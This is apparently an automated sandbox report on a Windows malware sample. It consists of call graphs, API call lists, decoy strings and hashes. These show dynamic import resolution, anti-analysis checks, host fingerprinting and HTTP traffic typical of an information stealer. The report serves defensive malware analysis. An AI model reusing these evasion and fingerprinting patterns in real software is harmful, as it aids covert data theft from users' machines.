API calls 37082->37083 37084 24243 37083->37084 37085 24610 2 API calls 37084->37085 37086 2425c 37085->37086 37087 24610 2 API calls 37086->37087 37088 24275 37087->37088 37089 24610 2 API calls 37088->37089 37090 2428e 37089->37090 37091 24610 2 API calls 37090->37091 37092 242a7 37091->37092 37093 24610 2 API calls 37092->37093 37094 242c0 37093->37094 37095 24610 2 API calls 37094->37095 37096 242d9 37095->37096 37097 24610 2 API calls 37096->37097 37098 242f2 37097->37098 37099 24610 2 API calls 37098->37099 37100 2430b 37099->37100 37101 24610 2 API calls 37100->37101 37102 24324 37101->37102 37103 24610 2 API calls 37102->37103 37104 2433d 37103->37104 37105 24610 2 API calls 37104->37105 37106 24356 37105->37106 37107 24610 2 API calls 37106->37107 37108 2436f 37107->37108 37109 24610 2 API calls 37108->37109 37110 24388 37109->37110 37111 24610 2 API calls 37110->37111 37112 243a1 37111->37112 37113 24610 2 API calls 37112->37113 37114 243ba 37113->37114 37115 24610 2 API calls 37114->37115 37116 243d3 37115->37116 37117 24610 2 API calls 37116->37117 37118 243ec 37117->37118 37119 24610 2 API calls 37118->37119 37120 24405 37119->37120 37121 24610 2 API calls 37120->37121 37122 2441e 37121->37122 37123 24610 2 API calls 37122->37123 37124 24437 37123->37124 37125 24610 2 API calls 37124->37125 37126 24450 37125->37126 37127 24610 2 API calls 37126->37127 37128 24469 37127->37128 37129 24610 2 API calls 37128->37129 37130 24482 37129->37130 37131 24610 2 API calls 37130->37131 37132 2449b 37131->37132 37133 24610 2 API calls 37132->37133 37134 244b4 37133->37134 37135 24610 2 API calls 37134->37135 37136 244cd 37135->37136 37137 24610 2 API calls 37136->37137 37138 244e6 37137->37138 37139 24610 2 API calls 37138->37139 37140 244ff 37139->37140 37141 24610 2 API calls 37140->37141 37142 24518 37141->37142 37143 24610 2 API calls 37142->37143 37144 24531 37143->37144 37145 24610 2 API calls 37144->37145 37146 2454a 37145->37146 37147 24610 2 API calls 
37146->37147 37148 24563 37147->37148 37149 24610 2 API calls 37148->37149 37150 2457c 37149->37150 37151 24610 2 API calls 37150->37151 37152 24595 37151->37152 37153 24610 2 API calls 37152->37153 37154 245ae 37153->37154 37155 24610 2 API calls 37154->37155 37156 245c7 37155->37156 37157 24610 2 API calls 37156->37157 37158 245e0 37157->37158 37159 24610 2 API calls 37158->37159 37160 245f9 37159->37160 37161 39f20 37160->37161 37162 39f30 43 API calls 37161->37162 37163 3a346 8 API calls 37161->37163 37162->37163 37164 3a456 37163->37164 37165 3a3dc GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 37163->37165 37166 3a463 8 API calls 37164->37166 37167 3a526 37164->37167 37165->37164 37166->37167 37168 3a5a8 37167->37168 37169 3a52f GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 37167->37169 37170 3a647 37168->37170 37171 3a5b5 6 API calls 37168->37171 37169->37168 37172 3a654 9 API calls 37170->37172 37173 3a72f 37170->37173 37171->37170 37172->37173 37174 3a7b2 37173->37174 37175 3a738 GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 37173->37175 37176 3a7bb GetProcAddress GetProcAddress 37174->37176 37177 3a7ec 37174->37177 37175->37174 37176->37177 37178 3a825 37177->37178 37179 3a7f5 GetProcAddress GetProcAddress 37177->37179 37180 3a922 37178->37180 37181 3a832 10 API calls 37178->37181 37179->37178 37182 3a92b GetProcAddress GetProcAddress GetProcAddress GetProcAddress 37180->37182 37183 3a98d 37180->37183 37181->37180 37182->37183 37184 3a996 GetProcAddress 37183->37184 37185 3a9ae 37183->37185 37184->37185 37186 3a9b7 GetProcAddress GetProcAddress GetProcAddress GetProcAddress 37185->37186 37187 35ef3 37185->37187 37186->37187 37188 21590 37187->37188 37458 216b0 37188->37458 37191 3aab0 lstrcpy 37192 215b5 37191->37192 37193 3aab0 lstrcpy 37192->37193 37194 215c7 37193->37194 37195 3aab0 lstrcpy 37194->37195 37196 215d9 37195->37196 37197 3aab0 lstrcpy 37196->37197 37198 
21663 37197->37198 37199 35760 37198->37199 37200 35771 37199->37200 37201 3ab30 2 API calls 37200->37201 37202 3577e 37201->37202 37203 3ab30 2 API calls 37202->37203 37204 3578b 37203->37204 37205 3ab30 2 API calls 37204->37205 37206 35798 37205->37206 37207 3aa50 lstrcpy 37206->37207 37208 357a5 37207->37208 37209 3aa50 lstrcpy 37208->37209 37210 357b2 37209->37210 37211 3aa50 lstrcpy 37210->37211 37212 357bf 37211->37212 37213 3aa50 lstrcpy 37212->37213 37251 357cc 37213->37251 37214 3ab30 lstrlen lstrcpy 37214->37251 37215 3abb0 lstrcpy 37215->37251 37216 35893 StrCmpCA 37216->37251 37217 358f0 StrCmpCA 37218 35a2c 37217->37218 37217->37251 37219 3abb0 lstrcpy 37218->37219 37220 35a38 37219->37220 37221 3ab30 2 API calls 37220->37221 37223 35a46 37221->37223 37222 35440 20 API calls 37222->37251 37225 3ab30 2 API calls 37223->37225 37224 35aa6 StrCmpCA 37226 35be1 37224->37226 37224->37251 37228 35a55 37225->37228 37227 3abb0 lstrcpy 37226->37227 37229 35bed 37227->37229 37230 216b0 lstrcpy 37228->37230 37231 3ab30 2 API calls 37229->37231 37250 35a61 37230->37250 37234 35bfb 37231->37234 37232 3aa50 lstrcpy 37232->37251 37233 35510 25 API calls 37233->37251 37238 3ab30 2 API calls 37234->37238 37235 35c5b StrCmpCA 37236 35c66 Sleep 37235->37236 37237 35c78 37235->37237 37236->37251 37239 3abb0 lstrcpy 37237->37239 37240 35c0a 37238->37240 37241 35c84 37239->37241 37242 216b0 lstrcpy 37240->37242 37243 3ab30 2 API calls 37241->37243 37242->37250 37244 35c93 37243->37244 37245 3ab30 2 API calls 37244->37245 37246 35ca2 37245->37246 37248 216b0 lstrcpy 37246->37248 37247 359da StrCmpCA 37247->37251 37248->37250 37249 3aab0 lstrcpy 37249->37251 37250->36306 37251->37214 37251->37215 37251->37216 37251->37217 37251->37222 37251->37224 37251->37232 37251->37233 37251->37235 37251->37247 37251->37249 37252 35b8f StrCmpCA 37251->37252 37253 21590 lstrcpy 37251->37253 37252->37251 37253->37251 37255 376e3 GetVolumeInformationA 37254->37255 37256 376dc 37254->37256 
37257 37721 37255->37257 37256->37255 37258 3778c GetProcessHeap RtlAllocateHeap 37257->37258 37259 377a9 37258->37259 37260 377b8 wsprintfA 37258->37260 37261 3aa50 lstrcpy 37259->37261 37262 3aa50 lstrcpy 37260->37262 37263 35ff7 37261->37263 37262->37263 37263->36327 37265 3aab0 lstrcpy 37264->37265 37266 248e9 37265->37266 37467 24800 37266->37467 37268 248f5 37269 3aa50 lstrcpy 37268->37269 37270 24927 37269->37270 37271 3aa50 lstrcpy 37270->37271 37272 24934 37271->37272 37273 3aa50 lstrcpy 37272->37273 37274 24941 37273->37274 37275 3aa50 lstrcpy 37274->37275 37276 2494e 37275->37276 37277 3aa50 lstrcpy 37276->37277 37278 2495b InternetOpenA StrCmpCA 37277->37278 37279 24994 37278->37279 37280 24f1b InternetCloseHandle 37279->37280 37473 38cf0 37279->37473 37282 24f38 37280->37282 37488 2a210 CryptStringToBinaryA 37282->37488 37283 249b3 37481 3ac30 37283->37481 37286 249c6 37288 3abb0 lstrcpy 37286->37288 37293 249cf 37288->37293 37289 3ab30 2 API calls 37290 24f55 37289->37290 37292 3acc0 4 API calls 37290->37292 37291 24f77 codecvt 37295 3aab0 lstrcpy 37291->37295 37294 24f6b 37292->37294 37297 3acc0 4 API calls 37293->37297 37296 3abb0 lstrcpy 37294->37296 37308 24fa7 37295->37308 37296->37291 37298 249f9 37297->37298 37299 3abb0 lstrcpy 37298->37299 37300 24a02 37299->37300 37301 3acc0 4 API calls 37300->37301 37302 24a21 37301->37302 37303 3abb0 lstrcpy 37302->37303 37304 24a2a 37303->37304 37305 3ac30 3 API calls 37304->37305 37306 24a48 37305->37306 37307 3abb0 lstrcpy 37306->37307 37309 24a51 37307->37309 37308->36330 37310 3acc0 4 API calls 37309->37310 37311 24a70 37310->37311 37312 3abb0 lstrcpy 37311->37312 37313 24a79 37312->37313 37314 3acc0 4 API calls 37313->37314 37315 24a98 37314->37315 37316 3abb0 lstrcpy 37315->37316 37317 24aa1 37316->37317 37318 3acc0 4 API calls 37317->37318 37319 24acd 37318->37319 37320 3ac30 3 API calls 37319->37320 37321 24ad4 37320->37321 37322 3abb0 lstrcpy 37321->37322 37323 24add 37322->37323 37324 24af3 
InternetConnectA 37323->37324 37324->37280 37325 24b23 HttpOpenRequestA 37324->37325 37327 24b78 37325->37327 37328 24f0e InternetCloseHandle 37325->37328 37329 3acc0 4 API calls 37327->37329 37328->37280 37330 24b8c 37329->37330 37331 3abb0 lstrcpy 37330->37331 37332 24b95 37331->37332 37333 3ac30 3 API calls 37332->37333 37334 24bb3 37333->37334 37335 3abb0 lstrcpy 37334->37335 37336 24bbc 37335->37336 37337 3acc0 4 API calls 37336->37337 37338 24bdb 37337->37338 37339 3abb0 lstrcpy 37338->37339 37340 24be4 37339->37340 37341 3acc0 4 API calls 37340->37341 37342 24c05 37341->37342 37343 3abb0 lstrcpy 37342->37343 37344 24c0e 37343->37344 37345 3acc0 4 API calls 37344->37345 37346 24c2e 37345->37346 37347 3abb0 lstrcpy 37346->37347 37348 24c37 37347->37348 37349 3acc0 4 API calls 37348->37349 37350 24c56 37349->37350 37351 3abb0 lstrcpy 37350->37351 37352 24c5f 37351->37352 37353 3ac30 3 API calls 37352->37353 37354 24c7d 37353->37354 37355 3abb0 lstrcpy 37354->37355 37356 24c86 37355->37356 37357 3acc0 4 API calls 37356->37357 37358 24ca5 37357->37358 37359 3abb0 lstrcpy 37358->37359 37360 24cae 37359->37360 37361 3acc0 4 API calls 37360->37361 37362 24ccd 37361->37362 37363 3abb0 lstrcpy 37362->37363 37364 24cd6 37363->37364 37365 3ac30 3 API calls 37364->37365 37366 24cf4 37365->37366 37367 3abb0 lstrcpy 37366->37367 37368 24cfd 37367->37368 37369 3acc0 4 API calls 37368->37369 37370 24d1c 37369->37370 37371 3abb0 lstrcpy 37370->37371 37372 24d25 37371->37372 37373 3acc0 4 API calls 37372->37373 37374 24d46 37373->37374 37375 3abb0 lstrcpy 37374->37375 37376 24d4f 37375->37376 37377 3acc0 4 API calls 37376->37377 37378 24d6f 37377->37378 37379 3abb0 lstrcpy 37378->37379 37380 24d78 37379->37380 37381 3acc0 4 API calls 37380->37381 37382 24d97 37381->37382 37383 3abb0 lstrcpy 37382->37383 37384 24da0 37383->37384 37385 3ac30 3 API calls 37384->37385 37386 24dbe 37385->37386 37387 3abb0 lstrcpy 37386->37387 37388 24dc7 37387->37388 37389 3aa50 lstrcpy 
37388->37389 37390 24de2 37389->37390 37391 3ac30 3 API calls 37390->37391 37392 24e03 37391->37392 37393 3ac30 3 API calls 37392->37393 37394 24e0a 37393->37394 37395 3abb0 lstrcpy 37394->37395 37396 24e16 37395->37396 37397 24e37 lstrlen 37396->37397 37398 24e4a 37397->37398 37399 24e53 lstrlen 37398->37399 37487 3ade0 37399->37487 37401 24e63 HttpSendRequestA 37402 24e82 InternetReadFile 37401->37402 37403 24eb7 InternetCloseHandle 37402->37403 37408 24eae 37402->37408 37405 3ab10 37403->37405 37405->37328 37406 3acc0 4 API calls 37406->37408 37407 3abb0 lstrcpy 37407->37408 37408->37402 37408->37403 37408->37406 37408->37407 37494 3ade0 37409->37494 37411 31a14 StrCmpCA 37412 31a1f ExitProcess 37411->37412 37424 31a27 37411->37424 37413 31c12 37413->36332 37414 31b63 StrCmpCA 37414->37424 37415 31b82 StrCmpCA 37415->37424 37416 31b41 StrCmpCA 37416->37424 37417 31ba1 StrCmpCA 37417->37424 37418 31bc0 StrCmpCA 37418->37424 37419 31acf StrCmpCA 37419->37424 37420 31aad StrCmpCA 37420->37424 37421 31b1f StrCmpCA 37421->37424 37422 31afd StrCmpCA 37422->37424 37423 3ab30 lstrlen lstrcpy 37423->37424 37424->37413 37424->37414 37424->37415 37424->37416 37424->37417 37424->37418 37424->37419 37424->37420 37424->37421 37424->37422 37424->37423 37425->36338 37426->36340 37427->36346 37428->36348 37429->36354 37430->36356 37431->36360 37432->36364 37433->36368 37434->36374 37435->36376 37436->36380 37437->36394 37438->36398 37439->36397 37440->36393 37441->36397 37442->36415 37443->36400 37444->36402 37445->36406 37446->36411 37447->36412 37448->36418 37449->36425 37450->36427 37451->36450 37452->36454 37453->36455 37454->36451 37455->36455 37456->36464 37459 3aab0 lstrcpy 37458->37459 37460 216c3 37459->37460 37461 3aab0 lstrcpy 37460->37461 37462 216d5 37461->37462 37463 3aab0 lstrcpy 37462->37463 37464 216e7 37463->37464 37465 3aab0 lstrcpy 37464->37465 37466 215a3 37465->37466 37466->37191 37468 24816 37467->37468 37469 24888 lstrlen 37468->37469 37493 3ade0 
37469->37493 37471 24898 InternetCrackUrlA 37472 248b7 37471->37472 37472->37268 37474 3aa50 lstrcpy 37473->37474 37475 38d04 37474->37475 37476 3aa50 lstrcpy 37475->37476 37477 38d12 GetSystemTime 37476->37477 37478 38d29 37477->37478 37479 3aab0 lstrcpy 37478->37479 37480 38d8c 37479->37480 37480->37283 37482 3ac41 37481->37482 37483 3ac98 37482->37483 37486 3ac78 lstrcpy lstrcat 37482->37486 37484 3aab0 lstrcpy 37483->37484 37485 3aca4 37484->37485 37485->37286 37486->37483 37487->37401 37489 24f3e 37488->37489 37490 2a249 LocalAlloc 37488->37490 37489->37289 37489->37291 37490->37489 37491 2a264 CryptStringToBinaryA 37490->37491 37491->37489 37492 2a289 LocalFree 37491->37492 37492->37489 37493->37471 37494->37411

                          Control-flow Graph
                          [Graph rendering data omitted. Recoverable content: function 39bb0-39bc4 calls 39aa0; block 39bca-39dde calls 39ad0 and GetProcAddress * 21; block 39de3-39e42 calls LoadLibraryA * 5; the remaining blocks 39e44-39f12 resolve further imports with GetProcAddress (1, 2, 1, 1 and 2 calls respectively).]
                          APIs
                          • GetProcAddress.KERNEL32(74DD0000,00FD2248), ref: 00039BF1
                          • GetProcAddress.KERNEL32(74DD0000,00FD2368), ref: 00039C0A
                          • GetProcAddress.KERNEL32(74DD0000,00FD2488), ref: 00039C22
                          • GetProcAddress.KERNEL32(74DD0000,00FD2260), ref: 00039C3A
                          • GetProcAddress.KERNEL32(74DD0000,00FD2338), ref: 00039C53
                          • GetProcAddress.KERNEL32(74DD0000,00FD9098), ref: 00039C6B
                          • GetProcAddress.KERNEL32(74DD0000,00FC5A70), ref: 00039C83
                          • GetProcAddress.KERNEL32(74DD0000,00FC5790), ref: 00039C9C
                          • GetProcAddress.KERNEL32(74DD0000,00FD2410), ref: 00039CB4
                          • GetProcAddress.KERNEL32(74DD0000,00FD22D8), ref: 00039CCC
                          • GetProcAddress.KERNEL32(74DD0000,00FD2308), ref: 00039CE5
                          • GetProcAddress.KERNEL32(74DD0000,00FD2440), ref: 00039CFD
                          • GetProcAddress.KERNEL32(74DD0000,00FC5950), ref: 00039D15
                          • GetProcAddress.KERNEL32(74DD0000,00FD23B0), ref: 00039D2E
                          • GetProcAddress.KERNEL32(74DD0000,00FD23C8), ref: 00039D46
                          • GetProcAddress.KERNEL32(74DD0000,00FC58F0), ref: 00039D5E
                          • GetProcAddress.KERNEL32(74DD0000,00FD24A0), ref: 00039D77
                          • GetProcAddress.KERNEL32(74DD0000,00FD24B8), ref: 00039D8F
                          • GetProcAddress.KERNEL32(74DD0000,00FC56B0), ref: 00039DA7
                          • GetProcAddress.KERNEL32(74DD0000,00FD24D0), ref: 00039DC0
                          • GetProcAddress.KERNEL32(74DD0000,00FC56D0), ref: 00039DD8
                          • LoadLibraryA.KERNEL32(00FD2578,?,00036CA0), ref: 00039DEA
                          • LoadLibraryA.KERNEL32(00FD25D8,?,00036CA0), ref: 00039DFB
                          • LoadLibraryA.KERNEL32(00FD2590,?,00036CA0), ref: 00039E0D
                          • LoadLibraryA.KERNEL32(00FD25C0,?,00036CA0), ref: 00039E1F
                          • LoadLibraryA.KERNEL32(00FD25A8,?,00036CA0), ref: 00039E30
                          • GetProcAddress.KERNEL32(75A70000,00FD2518), ref: 00039E52
                          • GetProcAddress.KERNEL32(75290000,00FD2530), ref: 00039E73
                          • GetProcAddress.KERNEL32(75290000,00FD2548), ref: 00039E8B
                          • GetProcAddress.KERNEL32(75BD0000,00FD2560), ref: 00039EAD
                          • GetProcAddress.KERNEL32(75450000,00FC5710), ref: 00039ECE
                          • GetProcAddress.KERNEL32(76E90000,00FD8F68), ref: 00039EEF
                          • GetProcAddress.KERNEL32(76E90000,NtQueryInformationProcess), ref: 00039F06
                          Strings
                          • NtQueryInformationProcess, xrefs: 00039EFA
                          Memory Dump Source
                          • Source File: 00000000.00000002.1797151165.0000000000021000.00000040.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                          • Associated: 00000000.00000002.1796925932.0000000000020000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1797151165.000000000004C000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1797151165.000000000015D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1797151165.0000000000169000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1797151165.000000000018E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1797151165.00000000002F6000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1798836116.000000000030A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1798836116.0000000000492000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1798836116.0000000000575000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1798836116.0000000000598000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1798836116.00000000005A0000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1798836116.00000000005B0000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1799449155.00000000005B1000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1799647636.0000000000751000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1799712015.0000000000752000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_20000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: AddressProc$LibraryLoad
                          • String ID: NtQueryInformationProcess
                          • API String ID: 2238633743-2781105232
                          • Opcode ID: d24193e7bd8e4c0e02b18605b02fceeed00b744c73819f6e875f261a63fcc2dc
                          • Instruction ID: 57dcd2df6624b08e7b87d7959b59204c207c67e5bda945de88ef74b53c3cc818
                          • Opcode Fuzzy Hash: d24193e7bd8e4c0e02b18605b02fceeed00b744c73819f6e875f261a63fcc2dc
                          • Instruction Fuzzy Hash: 1AA11BB5518200AFC384DFA8FC8C9767BB9E7497A1710863AF90AC3270DB75A955CF60

                          Control-flow Graph
                          [Graph rendering data omitted. Recoverable content: function 24610-246e5 calls RtlAllocateHeap, loops over blocks 246f0-246f6 and 246fc-2479a, then block 2479f-247f9 calls VirtualProtect.]
                          APIs
                          • RtlAllocateHeap.NTDLL(00000000), ref: 0002465F
                          • VirtualProtect.KERNEL32(?,00000004,00000100,00000000), ref: 000247EC
                          Strings
                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00024617, 00024622, 0002462D, 00024638, 00024643, 00024667, 00024672, 0002467D, 00024688, 00024693, 000246A7, 000246B2, 000246BD, 000246C8, 000246D3, 000246FC, 00024707, 00024712, 0002471D, 00024728, 00024763, 0002476E, 00024779, 00024784, 0002478F, 0002479F, 000247AA, 000247B5, 000247C0, 000247CB
                          Memory Dump Source
                          • Source File: 00000000.00000002.1797151165.0000000000021000.00000040.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                          • Associated: 00000000.00000002.1796925932.0000000000020000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1797151165.000000000004C000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1797151165.000000000015D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1797151165.0000000000169000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1797151165.000000000018E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1797151165.00000000002F6000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1798836116.000000000030A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1798836116.0000000000492000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1798836116.0000000000575000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1798836116.0000000000598000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1798836116.00000000005A0000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1798836116.00000000005B0000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1799449155.00000000005B1000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1799647636.0000000000751000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1799712015.0000000000752000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_20000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: AllocateHeapProtectVirtual
                          • String ID: The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United 
Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was 
founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.
                          • API String ID: 1542196881-2218711628
                          • Opcode ID: 30874602e8d4f4860263405ef121bb4c9c634f3b01cfbb5b7e16a754b5e1f54e
                          • Instruction ID: 2132ce8a2c0fccc9d5905121a84c95d56ff9e95e30c5d9f6acd0a71abb343e86
                          • Opcode Fuzzy Hash: 30874602e8d4f4860263405ef121bb4c9c634f3b01cfbb5b7e16a754b5e1f54e
                          • Instruction Fuzzy Hash: 7941E6A07C1607EFE634F7E49F42D9F76555F42709F407268AA005A283CFB265074BAA

                          Control-flow Graph (function at 262d0; graph image not reproduced)
                          APIs
                            • Part of subcall function 0003AAB0: lstrcpy.KERNEL32(?,00000000), ref: 0003AAF6
                            • Part of subcall function 00024800: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00024889
                            • Part of subcall function 00024800: InternetCrackUrlA.WININET(00000000,00000000), ref: 00024899
                            • Part of subcall function 0003AA50: lstrcpy.KERNEL32(00040E1A,00000000), ref: 0003AA98
                          • InternetOpenA.WININET(00040DFF,00000001,00000000,00000000,00000000), ref: 00026331
                          • StrCmpCA.SHLWAPI(?,00FDEA68), ref: 00026353
                          • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00026385
                          • HttpOpenRequestA.WININET(00000000,GET,?,00FDE068,00000000,00000000,00400100,00000000), ref: 000263D5
                          • InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 0002640F
                          • HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00026421
                          • HttpQueryInfoA.WININET(00000000,00000013,?,00000100,00000000), ref: 0002644D
                          • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 000264BD
                          • InternetCloseHandle.WININET(00000000), ref: 0002653F
                          • InternetCloseHandle.WININET(00000000), ref: 00026549
                          • InternetCloseHandle.WININET(00000000), ref: 00026553
                          Strings
                          Similarity
                          • API ID: Internet$CloseHandleHttp$OpenRequestlstrcpy$ConnectCrackFileInfoOptionQueryReadSendlstrlen
                          • String ID: ERROR$ERROR$GET
                          • API String ID: 3749127164-2509457195
                          • Opcode ID: 15b1ec2c06decc34ed2655b9773e212e53e965ba2da587d0098b8626743e19f2
                          • Instruction ID: d6c779a0a4fdf73dd12159934567d68b9fcef0fb8af026f9392a800133fd7027
                          • Opcode Fuzzy Hash: 15b1ec2c06decc34ed2655b9773e212e53e965ba2da587d0098b8626743e19f2
                          • Instruction Fuzzy Hash: E4717071A00228EBDB24DFA0DC59FEEB779BB45700F1081A8F50A6B191DBB56A84CF51

                          Control-flow Graph (function at 37690; graph image not reproduced)
                          APIs
                          • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 000376D2
                          • GetVolumeInformationA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0003770F
                          • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00037793
                          • RtlAllocateHeap.NTDLL(00000000), ref: 0003779A
                          • wsprintfA.USER32 ref: 000377D0
                            • Part of subcall function 0003AA50: lstrcpy.KERNEL32(00040E1A,00000000), ref: 0003AA98
                          Strings
                          Similarity
                          • API ID: Heap$AllocateDirectoryInformationProcessVolumeWindowslstrcpywsprintf
                          • String ID: :$C$\
                          • API String ID: 1544550907-3809124531
                          • Opcode ID: 446822d93932b42abd3d0809928721297b8d5d72d1c218fbdd5f655784b4960a
                          • Instruction ID: ba4d0b82261e6441ea9b5fcb3040b3da93e86b6a84891bdf7f2682f298990d19
                          • Opcode Fuzzy Hash: 446822d93932b42abd3d0809928721297b8d5d72d1c218fbdd5f655784b4960a
                          • Instruction Fuzzy Hash: 954185B1D04348ABDB21DF94DC45BEEB7B8AF48714F104099F609AB281D7746A44CBA5
                          APIs
                          • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,000211B7), ref: 00037A10
                          • RtlAllocateHeap.NTDLL(00000000), ref: 00037A17
                          • GetUserNameA.ADVAPI32(00000104,00000104), ref: 00037A2F
                          Similarity
                          • API ID: Heap$AllocateNameProcessUser
                          • String ID:
                          • API String ID: 1296208442-0
                          • Opcode ID: 47d172758ee6bbb5ea4fbae740fd2b0e5c90e84b0c7237853dc8ea03030391ee
                          • Instruction ID: a2527483ef493b9a89915355cae796104312f3aa1e3da2491a4d5a3605b335a2
                          • Opcode Fuzzy Hash: 47d172758ee6bbb5ea4fbae740fd2b0e5c90e84b0c7237853dc8ea03030391ee
